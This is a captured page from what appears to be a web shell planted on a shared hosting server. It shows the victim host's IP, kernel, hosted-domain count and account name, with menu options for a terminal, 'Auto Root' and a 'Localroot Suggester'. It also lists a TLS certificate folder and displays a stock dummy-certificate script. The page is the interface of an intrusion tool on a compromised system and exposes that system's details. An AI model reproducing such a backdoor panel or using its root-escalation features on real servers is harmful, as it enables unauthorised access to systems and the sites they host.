Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
alt-nodejs22 /
root /
etc /
pki /
tls /
certs /
Delete
Unzip
Name
Size
Permission
Date
Action
103-249-112-113.cprapid.com.crt
1.47
KB
-rw-r--r--
2026-09-04 10:23
Makefile
2.46
KB
-rw-r--r--
2024-04-29 07:49
ca-bundle.crt
220.43
KB
-r--r--r--
2026-09-04 09:35
ca-bundle.trust.crt
662.64
KB
-r--r--r--
2026-09-04 09:35
make-dummy-cert
636
B
-rwxr-xr-x
2024-04-29 07:49
renew-dummy-cert
856
B
-rwxr-xr-x
2024-04-29 07:49
Save
Rename
#!/bin/sh umask 077 answers() { echo -- echo SomeState echo SomeCity echo SomeOrganization echo SomeOrganizationalUnit echo localhost.localdomain echo root@localhost.localdomain } if [ $# -eq 0 ] ; then echo $"Usage: `basename $0` filename [...]" exit 0 fi for target in $@ ; do PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` trap "rm -f $PEM1 $PEM2" SIGINT answers | /opt/alt/alt-nodejs22/root/usr/bin/openssl req -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 2> /dev/null cat $PEM1 > ${target} echo "" >> ${target} cat $PEM2 >> ${target} rm -f $PEM1 $PEM2 done